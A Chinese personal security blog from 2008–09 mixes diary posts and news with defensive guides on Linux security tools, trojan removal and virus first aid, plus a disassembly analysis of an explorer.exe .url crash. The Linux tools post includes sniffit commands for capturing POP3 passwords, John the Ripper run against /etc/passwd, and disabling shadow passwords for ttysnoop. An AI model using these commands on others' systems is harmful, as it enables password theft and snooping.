Hackost's Blog

买本本了！

gtzwj — 2009-01-06 12:39

Hackost's Blog ( http://gtzwj.cn/ ) :

终于买到本本了，来闪一下..(PS:生活费就是这样没的...)

政府网被黑领导变暴露女

gtzwj — 2008-12-06 08:02

Hackost's Blog ( http://gtzwj.cn/ ) :

　荆楚网12月5日报道 5日上午9时23分左右，有网友向荆楚网报料称，荆州市商务局的网站被黑，领导介绍竟成了一位衣着暴露的性感女子。记者随即致电荆州市商务局，该局一工作人员表示刚接到省商务厅关于该局部分网页被黑的通知，目前正在全力以赴联系负责网站维护的公司。
　　9时23分，记者登陆荆州市商务局的网站看到，局领导介绍一栏中，赫然变成了一名身着三点内衣的性感女郎。而局长致辞则是“为女朋友庆生喝酒”的召集函。这两个栏目是本周热门，累计被点击9000余次。9时28分，记者再登陆时，该网站已无法正常打开。

　　9时36分，记者致电荆州市商务局办公室，询问该局是否知道网站被黑的消息，对方称刚收到湖北省商务厅通知，已进行技术处理，正在全力以赴联系负责网站维护的“荆楚时空”公司。最后，这名未透露姓名的工作人员希望记者“不要报道此事，我们马上就会进行处理。”
　　记者在网上搜索负责荆州市商务局建站网络公司——“荆楚时空”公司，获两家近似名称公司。荆州市荆楚时空科技有限公司是北京时空港科技有限公司(已在香港上市，股票代码：8127)驻荆州的子公司；另一家则是湖北省荆楚时空科技有限公司，但无具体介绍。
　　至9时45分记者发稿时止，荆州市商务局局领导介绍页面仍未恢复正常。

QQ终于申诉回来了！

gtzwj — 2008-12-05 16:25

Hackost's Blog ( http://gtzwj.cn/ ) :

       原来上高一的时候就拿到了这个七位的QQ:4244505，一直用了将近两年的时间，也为这个QQ投入了太多的精力，因为当时对于网络上这些形形色的东西什么也不懂，整天也就会和朋友聊个QQ什么的，看到别人用会员、黄钻什么等感觉特爽，便在网上找了一些公布的教程和几个论坛里的好友互相讨论了一番，最后用别人所谓最低级的方法刷到了QQ付费业务中几个自己感兴趣，可惜后来会员掉了，可我现在的黄钻和蓝钻还开着，呵呵。
       可是好景不长，由于自己当于顽玩，几乎天天去打通宵的玩电脑，浏览一个黑站的时候整个机器都卡的不行，几分钟之后QQ也掉了，习惯性的感觉可能这个站被挂马了，所以便在精神模模糊糊的时候改了密码，然后便睡觉了，可当自己醒来的时候才发现，原来我忘了当时改的是什么密码了，当时腾讯对于密保这个概念还是比较松的，也没有什么一代和二代密保的区别，只要知道码就可以改密码了，可怜我申诉了N次都没申诉成功，就这样子到了现在，没想到居然昨天晚上申诉，今天中午的时候腾讯回邮件说是申诉成功了，可知我当时那个喜啊，申诉一个QQ号，居然让我等了一年多。
       回想一下昨天晚上申诉QQ号的方法，和平时几乎没有什么区别，在此，向大家提几个小小的建议，说不定在你偶尔可以用一下：
       1、凡是腾讯的问题准确知道的，就填；对于那种模棱两可的答案，宁可不填。
       2、验证方法尽量选择腾讯的QQ邮箱，因为手机和其它的邮箱有时候会出现收不到的情况。
       3、QQ申诉最后一步的时候可以选填一下让自己的QQ好友验证的步骤，尽量先报申诉QQ里面最早的好友，填写朋友的资料和你朋友将来要对你验证的资料一定要相符，其实你也可以用你当时的另一个QQ来做，呵呵。
       说这么多废话，只是想纪念一下丢失N长时间的QQ又来回了，呵呵，希望大家别范和我一样的错误，特别是对待自己的密码这种东西，一定要小心哦！

JCP座谈：社区需要更多的开放性和更容易的参与性

gtzwj — 2008-12-01 14:04

Hackost's Blog ( http://gtzwj.cn/ ) :

QCon San Francisco 2008关于开放标准开发的座谈会邀请了JCP主席Patrick Curran以及社区中的名人一起分享了开放标准和开源开发的实际经验。从一开始就有两个主要的议题萦绕着该讨论：开放和降低JCP的参与门槛。

讨论首先从Belgian Java用户组（BeJUG）、JavaPolis及Parleys的的创建者Stephan Janssen开始。当Stephan被问到BeJUG为何能成为参与到JCP的两个Java用户组之一时，他说到这是因为他们参与到了BGGA Closures proposal中。他还提到由于经费的原因导致JUG很难参与到其中。Patrick Curran补充到尽管参与JCP并不是免费的，但对于非盈利的组织来说是有折扣的。

Michael Van Riper（Silicon Valley Web JUG和Silicon Valley Google Technology User Group的领导者）继续说到从他的经历来看，在JCP中根本就感受不到社区的那种氛围，至少在特定的JSR外是这样的。他又说到经费是个问题，并提议将JUG USA作为一个保护组织。

接下来发言的是Michael Ashley（Cultural Heritage Imaging的开发主管），他强调JCP缺少对公众的开放性。这一点也得到了Cay Horstmann（来自圣何塞州大学）的认同。他还强调对于标准化进行来说，透明度是很重要的，并提到了开放标准在教育上的价值。

之后，来自Artima的Bill Venners提出了这样一个问题：什么时候有必要去标准化一种语言，同时他得出了这样一个结论：标准只有具备多种实现时才有价值。在大多数其他情况下，最好是只有一个语言包。来自National Institute of Standards and Technology的Lynne Rosenthal说到基本的团队工作决定了标准组织的成败。同样熟悉官场并会说官话的人也是非常重要的。最后她说到领导者是JSR成功的关键要素。

Loretta Guarino Reid（Google可访问性工程团队的成员）被问到她的团队与伤残人士的协作程度如何。她说有很多伤残人士与他们一起工作，他们正在尽力让其所有文档都具有可访问性。她还提到他们想与听力有障碍的人一起工作，直到现在他们才开始实现这个目标。Rod Johnson（Spring framework之父）是最后一个发言的，他对过去JCP的运作方式是很有发言权的，同时他还在最近当选为JCP执行委员会的委员。他被问到为何他对JCP提出了这么多批评而还要加入到其中呢，他说他已经看到了一些积极的改变。他也强烈建议增加过程的透明度并让社区参与其中——成为“Java公民”。Patrick Curran为JCP过程进行了辩护，他说正常情况下所有的会议记录都会公开，同时他们正在构建一些群件（groupware）工具，这些工具将在站点的下一版中发布，它会对开放起到促进作用。Rod Johnson被问到“Java公民”是什么意思，他说作为Java社区的成员，人们有权利，也有特权去使用他们，为了实现这一点，人们需要参与其中。

一些观众提到对于普通的程序员来说，想参与JCP可不是那么容易的事，但Patrick Curran说实际上该过程对所有人都是开放的，真的没什么障碍。Rod Johnson补充说到一些开源项目组不需要对小事斤斤计较，然而Cay Horstmann提到对于普通人来说，要想直接参与到技术当中还是相当困难的。Stephan Janssen说整个过程都失去了透明性。

此时，一些观众抱怨规范太难理解了，他们提议建立一个开源的代码仓库、公共话题跟踪及邮件列表。Rod Johnson说规范不会告诉你某项技术是否能完成你所期望的事情。

在几个观众提到规范领导者应该走出来并大力发展社区后，InfoQ的主编Floyd Marinescu问到JCP是否考虑过为决定的“民主化”进行一些公众调查。Patrick Curran回应说他们还没有考虑过这么做，但他表示借助于为下一版的JCP站点所开发的新的协作工具，人们将有更多的机会参与进来。

有很多观众对OSGi上的Java模块化提出了反对意见，他们觉得这会导致混乱。而Patrick Curran却不这么认为，他说尽管他不是该领域的专家，但之所以做出这个决定是有很多技术上的原因的。

其中有个观众是某个规范的领导者，他说想与其他规范领导者联系上简直太难了，同时他也对JSR之间的人无法以简单、自然的方式进行交流这一事实提出了批评。Patrick Curran说过程确实是“丢了某些东西”，这时Rod Johnson又重复了自己的观点：更多的开放性会对此有所帮助。Cay Horstmann也承认了这个问题。观众依然坚持认为在规范领导者之间没有一种好的沟通方式，这时Rod Johnson说到哪怕在JSR之间存在着定义良好的范围依然会有问题，这会使事情变得更困难。

此后，一些观众又对文件的复杂性提出了批评，Patrick Curran说到合法的协议保证了JCP今后不会遇到法律上的问题。讨论一整天都在围绕着该主题进行，一直到结束。最后观众希望JCP能降低参与的门槛并减少一些文件，而Patrick Curran却说当前的情况是正常的。InfoWorld和JavaWorld都对座谈的这方面内容进行了报道。

随着社区不断要求JCP提供更多的开放性和更容易的参与性，让我们对过程的发展拭目以待吧。

原文：http://www.infoq.com/news/2008/11/qconsf08_jcp;jsessionid=E1030C8C61E78A9D3653FDD15A111335

常用的Linux网络安全工具简介

gtzwj — 2008-11-23 22:31

Hackost's Blog ( http://gtzwj.cn/ ) :

尽管各种版本的Linux distribution 附带了很多开放源代码的自由软件，但是仍然有大量的有用的工具没有被默认包括在它们的安装光盘内，特别是有一些可以增强Linux网络安全的工具包，它们大多也是开放源的自由软件。

这里简单地介绍一下几个增强Linux网络安全的工具。
1. sudo
sudo是系统管理员用来允许某些用户以root身份运行部分/全部系统命令的程序。一个明显的用途是增强了站点的安全性，如果你需要每天以root身份做一些日常工作，经常执行一些固定的几个只有root身份才能执行的命令，那么用sudo对你是非常适合的。

sudo的主页在：http://www.courtesan.com/courtesan/products/sudo/
以Redhat 为例，下面介绍一下安装及设置过程：
首先，你能从sudo主页上下载for Redhat Linux的rpm package.
它在ftp://ftp.freshmeat.net/pub/rpms/sudo/
当前最新的稳定版本1.5.9p4。
执行#rpm -ivh sudo* 进行安装，然后用/usr/sbin/visudo编辑/etc/sudoers文件。如果系统提示你找不到/usr/bin/vi但实际上你在目录 /bin下有vi程序，你需要ln -sf /bin/vi /usr/bin/vi为 vi 在/usr/bin下创建符号链接。（注：我在Redhat 6.1上遇到，Redhat 5.x上没有此问题）

另外，如果出现某些其它错误，你可能还需要#chmod 700 /var/run/sudo
下面是我的/etc/sudoers文件例子：
[root@sh-proxy /etc]# more sudoers
Host_Alias SERVER=sh-proxy
# User alias specification
User_Alias ADMIN=jephe,tome
# Cmnd alias specification
Cmnd_Alias SHUTDOWN=/etc/halt,/etc/shutdown,/etc/reboot
ADMIN SERVER=SHUTDOWN
jephe SERVER=/usr/bin/tail -f /var/log/maillog
jephe SERVER=/usr/bin/tail -f /var/log/messages
# User privilege specification
root ALL=(ALL) ALL
-----------
既然我经常需要远程登录到服务器观察email log文件/var/log/maillog的变化，因此我加了这一行到 /etc/sudoers，这样我不需要经常登录作为root来完成我的日常工作，改善了安全性。

2. Sniffit
sniffit 是一个有名的网络端口探测器，你可以配置它在后台运行以检测哪些Tcp/ip端口上用户的输入/输出信息。
最常用的功能是攻击者可以用它来检测你的23(telnet)和110(pop3)端口上的数据传送以轻松得到你的登录口令和mail帐号密码，sniffit基本上是被破坏者所利用的工具，但是既然想知道如何增强你的站点的安全性，首先你应该知晓闯入者们所使用的各种工具。

sniffit 的主页在 http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
你能从那里下载最新的版本，安装是非常容易的,就在根目录运行#tar xvfz sniff*
解开所有文件到对应目录。
你能运行sniffit -i以交互式图形界面查看所有在指定网络接口上的输入/输出信息。如：为了得到所有用户通过某接口a.b.c.d接收邮件时所输入的pop3帐号和密码，你能运行

#sniffit -p 110 -t a.b.c.d &
#sniffit -p 110 -s a.b.c.d &
记录文件放在目录/usr/doc/sniffit*下面：
log file根据访问者的IP地址，随机高端端口号和用来检测的网络接口IP地址和检测端口来命名。它利用了tcp/ip协议天生的虚弱性，因为普通的 telnet和pop3所传的用户名和密码信息都是明文，不带任何方式的加密。因此对telnet/ftp.你可以用ssh/scp来替代. sniffit检测到的ssh/scp信息基本上是一堆乱码，因此你不需要担心ssh所传送的用户名和口令信息会被第三方所窃取。

3. ttysnoop(s)
ttysnoop是一个重定向对一个终端号的所有输入/输出到另一个终端的程序。目前我所知道的它的所在网站为http: //uscan.cjb.net,但是始终连不上去，从其它途径我得到了ttysnoop-0.12c-5 ,地址是http://rpmfind.net/linux/RPM/contrib/libc6/i386/ttysnoop-0.12c- 5.i386.html这个版本好象还不能支持shadow password,安装后你需要手动创建目录/var/spool/ttysnoop测试这个程序是有趣的，下面是相关指令：首先改/etc /inetd.conf中的in.telnetd默认调用login登录程序为/sbin/ttysnoops,象下面这样：

[root@jephe /etc]# more inetd.conf | grep in.telnetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -L /sbin/ttysnoops
更改后一定要运行killall -HUP inetd使之生效
确保不要使用阴影口令，用#pwunconv禁止阴影口令。
再编辑文件/etc/snooptab
默认配置就可以了。
[root@jephe /etc]# more snooptab
ttyS1 /dev/tty7 login /bin/login
ttyS2 /dev/tty8 login /bin/login
* socket login /bin/login
------
最后，如果在某个终端上有人登录进来（你可以用w命令查看它在哪个终端），如登录终端设备为ttyp0,则你可以登录进服务器打入#/bin/ttysnoop ttyp0（提示输入root口令,再次,上面提到的这个版本不支持阴影口令）以监视用户的登录窗口。

4. nmap
nmap 是用来对一个比较大的网络进行端口扫描的工具，它能检测该服务器有哪些tcp/ip端口目前正处于打开状态。你可以运行它来确保已经禁止掉不该打开的不安全的端口号。nmap的主页在http://www.insecure.org/nmap/index.html

下面给出一个简单的例子：
[root@sh-proxy /etc]# /usr/local/bin/nmap public.sta.net.cn
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
109 open tcp pop-2
110 open tcp pop-3
143 open tcp imap2
513 open tcp login
514 open tcp shell
7000 open tcp afs3-fileserver
Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds
==========

在Linux中，密码以hash格式被存储，你不能反向从该hash数据表中分析出密码，但可以以一组单词hash后和它进行比较，如相同则就猜测出密码。故起一个很难被猜测的密码是非常关键的。一般地你决不能用字典存在的某个单词作为密码，那是相当容易被猜测出来的。另外也不能用一些常见的有规则性的字母数字排列来作为密码，以123abc等。

John the ripper是一个高效的易于使用的密码猜测程序，其主页在http://www.openwall.com/john/

下载tar.gz格式的for UNIX的程序，然后用tar xvfz john*.tar.gz解开到任一目录下。进入src目录，打入make linux-x86-any-elf (我用redhat 6.1)后会在run目录下生成几个执行文件，包括主程序john。现在要Crack密码就运行./john /etc/passwd即可。

John也可以Crack由htpasswd 生成的用于验证apache用户的密码，如果你用htpasswd -c apachepasswd user 创建了一个用户user,并生成了密码，你也可以用john apachepasswd来进行猜测。

John在猜测密码时输出在终端上，并把猜测出的密码存于john.pot文件中。

另一个password Cracker是大家知道的经典的Cracker. 主页在

http://www.users.dircon.co.uk/~crypto/

二.Logcheck

Logcheck是用来自动检查系统安全入侵事件和非正常活动记录的工具，它分析各种Linux log文件，象/var/log/messages, /var/log/secure,/var/log/maillog等等，然后生成一个可能有安全问题的问题报告自动发送email给管理员。你能设置它基于每小时,或者每天用crond来自动运行。

logcheck工具的主页在http://www.psionic.com/abacus/logcheck/

下载后用tar xvfz logcheck*解开到一临时目录如/tmp下，然后用./make linux自动生成相应的文件到/usr/local/etc,/usr/local/bin/等目录下，你可能更改设置如发送通知能谁的邮件帐号，默认发送到root，你能设置root的邮件别名帐号到一批人，更改设置让其忽略某些类型的消息如你的邮件记录文件中的plug-gw，因为plug-gw做反向IP查找，若找不到则记录一个警告消息到/var/log/maillog，logcheck默认记录下所有这些警告发送给你，你可以通过设置忽略掉它们。

利用logcheck工具分析你的所有logfile，避免了你每天经常手动地检查它们，节省了时间，提高了效率。

三. Tripwire

Tripwire 是一个用来检验文件完整性的非常有用的工具，你能定义哪些文件/目录需要被检验，不过默认设置能满足大多数的要求，它运行在四种模下：数据库生成模式，数据库更新模式，文件完整性检查，互动式数据库更新。当初始化数据库生成的时候，它生成对现有文件的各种信息的数据库文件，万一以后你的系统文件或者各种配置文件被意外地改变，替换，删除，它将每天基于原始的数据库对现有文件进行比较发现哪些文件被更改，你能根据email的结果判断是否有系统入侵等意外事件。

Tripwire的主页在 http://www.tripwiresecurity.com , tripwire-1.2.3的版本你能免费使用. 如果你使用Redhat Linux 6.1，你也能得到最新的为6.1重建的Tripwire-1.2.3

（http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html）

当你手动更改了系统中的配置文件或程序时

linux 学习笔记（一）

gtzwj — 2008-11-23 19:10

Hackost's Blog ( http://gtzwj.cn/ ) :

linux 系统都有根文件系统，它包含系统引导和使用其它文件系统得以挂载所必需的文件，根文件系统需要有单用户状态所必须的足够的内容，还包括修复损坏系统、恢复备份的工具。

linux 系统的目录结构是分层的树形结构，挂载在根文件系统“／”下，下面列出了linux系统的目录结构：

drwxr-xr-x   2 root root 4096 11-24 00:56 bin
drwxr-xr-x   5 root root 1024 11-24 00:29 boot
drwxr-xr-x 13 root root 3820 11-24 02:02 dev
drwxr-xr-x 121 root root 12288 11-24 01:39 etc
drwxr-xr-x   3 root root 4096 11-24 01:03 home
drwxr-xr-x 15 root root 12288 11-24 00:50 lib
drwx------   2 root root 16384 11-24 00:22 lost+found
drwxr-xr-x   2 root root 4096 11-24 02:02 media
drwxr-xr-x   2 root root 4096 11-24 18:44 mnt
drwxr-xr-x   2 root root 4096 2008-04-08 opt
dr-xr-xr-x 165 root root     0 11-24 01:37 proc
drwxr-x--- 30 root root 4096 11-24 18:45 root
drwxr-xr-x   2 root root 12288 11-24 00:56 sbin
drwxr-xr-x   7 root root     0 11-24 01:37 selinux
drwxr-xr-x   2 root root 4096 2008-04-08 srv
drwxr-xr-x 11 root root     0 11-24 01:37 sys
drwxrwxrwt 22 root root 4096 11-24 18:43 tmp
drwxr-xr-x 13 root root 4096 10-30 15:32 usr
drwxr-xr-x 22 root root 4096 11-24 00:56 var

下面详细介绍 linux目录结构中常用的子目录。

1、／ home

包含用户宿主目录，即系统上的所有实际数据。将宿主目录分别分到自己的目录树或文件系统中易于备份，其他部分不必经常备份。

2、／ sbin

类似于／bin，只有ROOT用户才能使用。

3、／ROOT

ROOT用户的宿主目录。

4、／lib

根文件系统上的程序所需的共享库和内核模块。

/lib/modules 为核心可加载模块，特别是那些恢复损坏系统时引导所需的模块（例如网络和文件系统驱动）。

5、／dev

包括所有设备的设备文件

6、／tmp

用于存放各种临时文件。

7、／boot

引导加载器时使用的文件，如GRUB。核心映像也经常在这里，而不是在根目录。

8、／mnt

系统管理员临时挂载的安装点。程序并不自动支持安装到／MNT，／MNT 可以分为子目录。

9、／usr

包含所有命令、库、MAN页和其他一般操作中所需的不改变的文件。／USR目录经常很大，因为所有程序都安装在这里。／USR里的所有文件一般来自linux distribution,本地安装的程序和其他数据在／USR／LOCAL下。这样在升级新版系统或新 distribution 时无须重新安装全部程序。

10、／proc

／proc文件系统是一个假的文件系统，它不存在某个磁盘上，而是由内核在内存中产生，用于提供系统的相关的相关信息。

11、／etc

存放计算机系统的配置文件。

12、／var

包含经常更改的文件，比如SPOOL目录、日志文件和暂存文件等。

拦门四斧砍清系统中各类型木马

gtzwj — 2008-11-14 10:32

Hackost's Blog ( http://gtzwj.cn/ ) :

　黑客入侵后要做的事就是上传木马后门，为了能够让上传的木马不被发现，他们会想尽种种方法对其进行伪装。而作为被害者，我们又该如何识破伪装，将系统中的木马统统清除掉呢！

　　一、文件捆绑检测

　　将木马捆绑在正常程序中，一直是木马伪装攻击的一种常用手段。下面我们就看看如何才能检测出文件中捆绑的木马。

　　1.MT捆绑克星

　　文件中只要捆绑了木马，那么其文件头特征码一定会表现出一定的规律，而MT捆绑克星正是通过分析程序的文件头特征码来判断的。程序运行后，我们只要单击“浏览”按钮，选择需要进行检测的文件，然后单击主界面上的“分析”按钮，这样程序就会自动对添加进来的文件进行分析。此时，我们只要查看分析结果中可执行的头部数，如果有两个或更多的可执行文件头部，那么说明此文件一定是被捆绑过的！

　　2.揪出捆绑在程序中的木马

　　光检测出了文件中捆绑了木马是远远不够的，还必须请出“Fearless Bound File Detector”这样的“特工”来清除其中的木马。

　　程序运行后会首先要求选择需要检测的程序或文件，然后单击主界面中的“Process”按钮，分析完毕再单击“Clean File”按钮，在弹出警告对话框中单击“是”按钮确认清除程序中被捆绑的木马。

　　二、清除DLL类后门

　　相对文件捆绑运行，DLL插入类的木马显的更加高级，具有无进程，不开端口等特点，一般人很难发觉。因此清除的步骤也相对复杂一点。

　　1.结束木马进程

　　由于该类型的木马是嵌入在其它进程之中的，本身在进程查看器中并不会生成具体的项目，对此我们如果发现自己系统出现异常时，则需要判断是否中了DLL木马。

　　在这里我们借助的是IceSword工具，运行该程序后会自动检测系统正在运行的进程，右击可疑的进程，在弹出的菜单中选择“模块信息”，在弹出的窗口中即可查看所有DLL模块，这时如果发现有来历不明的项目就可以将其选中，然后单击“卸载”按钮将其从进程中删除。对于一些比较顽固的进程，我们还将其中，单击“强行解除”按钮，然后再通过“模块文件名”栏中的地址，直接到其文件夹中将其删除。

　　2.查找可疑DLL模块

　　由于一般用户对DLL文件的调用情况并不熟悉，因此很难判断出哪个DLL模块是不是可疑的。这样ECQ-PS（超级进程王）即可派上用场。

　　运行软件后即可在中间的列表中可以看到当前系统中的所有进程，双击其中的某个进程后，可以在下面窗口的“全部模块”标签中，即可显示详细的信息，包括模块名称、版本和厂商，以及创建的时间等。其中的厂商和创建时间信息比较重要，如果是一个系统关键进程如“svchost.exe”，结果调用的却是一个不知名的厂商的模块，那该模块必定是有问题的。另外如果厂商虽然是微软的，但创建时间却与其它的DLL模块时间不同，那么也可能是DLL木马。

　　另外我们也可以直接切换到“可疑模块”选项，软件会自动扫描模块中的可疑文件，并在列表中显示出来。双击扫描结果列表中的可疑DLL模块，可看到调用此模块的进程。一般每一个DLL文件都有多个进程会调用，如果调用此DLL文件的仅仅是此一个进程，也可能是DLL木马。点击“强进删除”按钮，即可将DLL木马从进程中删除掉。

　三、彻底的Rootkit检测

　　谁都不可能每时每刻对系统中的端口、注册表、文件、服务进行挨个的检查，看是否隐藏木马。这时候我可以使用一些特殊的工具进行检测。

　　1.Rootkit Detector清除Rootkit

　　Rootkit Detector是一个Rootkit检测和清除工具，可以检测出多个Windows下的Rootkit 其中包括大名鼎鼎的hxdef.100。使用方法很简单，在命令行下直接运行程序名“rkdetector.exe”即可。程序运行后将会自动完成一系统列隐藏项目检测，查找出系统中正在运行的Rootkit程序及服务，以红色作出标记提醒，并尝试将它清除掉。

　　2.强大的Knlps

　　相比之下，Knlps的功能更为强大一些，它可以指定结束正在运行的Rootkit程序。使用时在命令行下输入“knlps.exe -l”命令，将显示系统中所有隐藏的Rootkit进程及相应的进程PID号。找到Rootkit进程后，可以使用“-k”参数进行删除。例如已找到了“svch0st.exe”的进程，及PID号为“3908”，可以输入命令“knlps.exe -k 3908”将进程中止掉。

　　四、克隆帐号的检测

　　严格意义上来说，它已经不是后门木马了。但是他同样是在系统中建立了管理员权限的账号，但是我们查看的却是Guest组的成员，非常容易麻痹管理员。

　　在这里为大家介绍一款新的帐号克隆检测工具LP_Check，它可以明查秋毫的检查出系统中的克隆用户！

　　LP_Check的使用极其简单，程序运行后会对注册表及“帐号管理器”中的用户帐号和权限进行对比检测，可以看到程序检测出了刚才Guest帐号有问题，并在列表中以红色三角符号重点标记出来，这时我们就可以打开用户管理窗口将其删除了。

伯乐木马被警方查封，“伯乐”被逮捕

gtzwj — 2008-11-14 10:28

Hackost's Blog ( http://gtzwj.cn/ ) :

扬州警方破获黑客制售木马病毒案

具体详情：http://video.sina.com.cn/news/s/l/v/2008-11-02/192024257.shtml

　扬州市警方经过数月缜密侦查，成功破获破坏计算机信息系统的大案，查扣涉案计算机30余台，缴获巨额赃款100万元以上，抓获20余涉案嫌疑人。据了解，目前该案已进入审查起诉阶段，记者对案件情况进行了更为详尽的采访。
江苏电视台《1860新闻眼》今日播出“扬州警方破获黑客制售木马病毒案”，以上为节目视频。

TND,郁闷的一天...

gtzwj — 2008-11-11 20:24

Hackost's Blog ( http://gtzwj.cn/ ) :

今天真TM的郁闷啊!

早上起来打开电脑发现怎么都连不上网,能想到的问题都试了一遍,最后实在没办法了,便向电信打电话.打电话的时候我还在想"丢人啊,学电脑这么长时间连自己的电脑上不了网都解决不了",一通电话电信的回答让我更是郁闷----"现在全市都上不了网,你别着急,应该很快就可以了."

不能上网,没办法放着音乐去洗了洗,回来后发现终于可以上网了,网上找了点关于php的教程学习着,可没到十分钟,驾校尽然打过来电话,说是今天要我考试. 天杀的驾校尽然今天临时通知我,没办法,硬着头皮去考吧..打了个电话给我的一个朋友,在我的死缠烂打之下终于在驾校的教练说的上午九点之前到了驾校.

一个字"人他娘的真多" ^-^

教练的一句话真恨,十一点之后开始C本考试....MD.

十一点、十一点半……怎么还没开始？

十二点神秘的教练露面了，可以开始了，该死的教练临走扔下一句累死人不偿命的话“考驾照都别走昂，一直在旁边等着，很可能下一个考试的就是你们其中的一个，都听着念你们的名字” 闷

等

可怜的我啊，竟然让我等到了下午四点，我的腿愣是一点儿也没有休息啊。心里数了一下，今天站了七个小时啊！！！我是今天去考试的所有人有倒数第三个，真他娘的郁闷啊。

个人电脑中毒紧急处理措施大杂烩

gtzwj — 2008-11-10 08:19

Hackost's Blog ( http://gtzwj.cn/ ) :

虽然有杀毒软件和防火墙供大家作为电脑的保护，但新病毒和木马，加上黑客人工的入侵方式，电脑中毒的情况还是很普遍。尤其是上网的用户，一不留意就会中招。如何防止中毒的技巧文章，大家已经看得很多了。那么万一中毒了，该如何处理呢?下面就谈谈中毒后的一些紧急处理措施。

一、正在上网的用户，发现异常应首先马上断开连接

如果你发现IE经常询问你是否运行某些ActiveX控件，或是生成莫明其妙的文件、询问调试脚本什么的，一定要警惕了，你可能已经中招了。典型的上网被入侵有两种情况：

1、是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题，这算是轻的;还有就是遇到可以格式化硬盘或是令你的Windows不断打开窗口，直到耗尽资源死机。这种情况恶劣得多，你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。

2、是黑客的潜在木马发作，或是蠕虫类病毒发作，让你的机器不断地向外界发送你的隐私;或是利用你的名义和邮件地址发送极品，进一步传播病毒;还有就是黑客的手工入侵，窥探你的隐私或是删除破坏你的文件。

处理办法：马上断开连接，这样能将自己的损失降低的同时，也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机，进一步的处理措施请参看后文。

二、中毒后，应马上备份转移文档和邮件等

中毒后运行杀毒软件清除是不在话下的了，但为了防止杀毒软件误杀或是删掉你还处理完的文档和重要的邮件，你应该首先将它们转移备份到其他储存媒体上。有些长文件名的文件和未处理的邮件要求在Windows下备份，所以第一点这里笔者建议您先不要退出windows，因为病毒一旦发作，可能就不能进入Windows了。

不管这些文件是否带毒了，你都应该备份，用标签纸标记为待查即可。因为有些病毒是专门针对某个杀毒软件设计的，一运行就会破坏其他的文件，所以先备份是以防万一的措施。等你清除完硬盘内的病毒后，再来慢慢分析处理这些额外备份的文件较为妥善。

三、需要干净的DOS启动盘和DOS下面的杀毒软件

到现在，就应该按很多杀毒软件的标准手册去按步就班地做，即关机后冷启动，用一张干净的DOS启动盘引导是不能少的了;另外由于中毒后可能Windows已经被破坏了部分关键文件，会频繁地非法操作，所以Windows下的杀毒软件可能会无法运行。所以请你也准备一个DOS下面的杀毒软件来以防万一。

即使能在Windows下运行杀毒软件的，也请用两种以上工具交叉清理。在多数情况下Windows可能要重装，因为病毒会破坏掉一部分文件让系统变慢或出现频繁的非法操作。建议不要对某种杀毒软件带偏见，由于开发时候侧重点不同，使用的杀毒引擎不同，各种杀毒软件都是有自己的长处和短处的，交叉使用效果较理想。

四、如果有GHOST和分区表、引导区的备份，用之来恢复一次最保险

如果你在平时作了Windows的Ghost备份，用之来镜像一次，得到的操作系统是最保险的。这样连潜在的未杀光的木马程序也顺便清理了，当然，这要求你的GHOST备份是绝对可靠的。

五、再次恢复系统后，更改你的网络相关密码

包括登录网络的用户名、密码，邮箱的密码和QQ的等等，防止黑客已经在上次入侵过程中知道了你的密码。另外因为很多蠕虫病毒发作会向外随机发送你的信息，所以适当的更改是必要的。

解析URL格式化漏洞

gtzwj — 2008-11-07 09:39

Hackost's Blog ( http://gtzwj.cn/ ) :

1.描述
　　Windows的Shell程序explorer.exe在处理包含畸形数据的“.url”文件时存在问题，本地攻击者可能利用此漏洞导致用户机器上的explorer.exe进程崩溃。
　　如果explorer.exe解析了包含有特别格式URL的*.url文件的话，就会导致崩溃。即使通过资源管理器试图删除这个文件时也会触发崩溃。
　　目前厂商还没有提供补丁或者升级程序，到目前为止该漏洞依然有效。

汇编代码中际出错的地址:
7D5CE6B9 push ecx
7D5CE6BA lea ecx, dword ptr [esp+8]
7D5CE6BE sub ecx, 1000
7D5CE6C4 sub eax, 1000
7D5CE6C9 test dword ptr [ecx], eax 异常地址
7D5CE6CB cmp eax, 1000
7D5CE6D0 jnb short 7D5CE6BE
7D5CE6D2 sub ecx, eax
7D5CE6D4 mov eax, esp
7D5CE6D6 test dword ptr [ecx], eax
7D5CE6D8 mov esp, ecx
7D5CE6DA mov ecx, dword ptr [eax]
7D5CE6DC mov eax, dword ptr [eax+4]
7D5CE6DF push eax
7D5CE6E0 retn
　　2.详细分析
　　在IDA的反汇编中可知：
public: virtual long __stdcall CFileUrlStub::ParseDisplayName(struct HWND__ *, struct IBindCtx *, unsigned short *, unsigned long *, struct _ITEMIDLIST * *, unsigned long *) proc near
.text:7D6A112C ; DATAnbsp;XREF: .text:7D5A327Co
.text:7D6A112C
.text:7D6A112C var_20A0 = dword ptr -20A0h
.text:7D6A112C var_209C = dword ptr -209Ch
.text:7D6A112C var_2098 = dword ptr -2098h
.text:7D6A112C Srch = word ptr -2094h
.text:7D6A112C var_104C = dword ptr -104Ch
.text:7D6A112C var_4 = dword ptr -4
.text:7D6A112C arg_C = dword ptr 14h
.text:7D6A112C arg_14 = dword ptr 1Ch
.text:7D6A112C arg_18 = dword ptr 20h
.text:7D6A112C
.text:7D6A112C mov edi, edi
.text:7D6A112E push ebp
.text:7D6A112F mov ebp, esp
.text:7D6A1131 mov eax, 20A0h 局部堆栈长度
.text:7D6A1136 call __chkstk 出错函数地址
.text:7D6A1136
.text:7D6A113B mov eax, ___security_cookie
.text:7D6A1140 push ebx
.text:7D6A1141 mov ebx, [ebp+arg_18]
.text:7D6A1144 push esi
.text:7D6A1145 mov esi, [ebp+arg_14]
.text:7D6A1148 push edi
.text:7D6A1149 mov edi, [ebp+arg_C]
.text:7D6A114C push edi
.text:7D6A114D mov [ebp+var_4], eax
.text:7D6A1150 call ds:UrlGetLocationW(x)
.text:7D6A1156 push 0
.text:7D6A1158 mov [ebp+var_2098], eax
.text:7D6A115E push 6
.text:7D6A1160 lea eax, [ebp+var_209C]
.text:7D6A1166 push eax
.text:7D6A1167 lea eax, [ebp+var_104C+2]
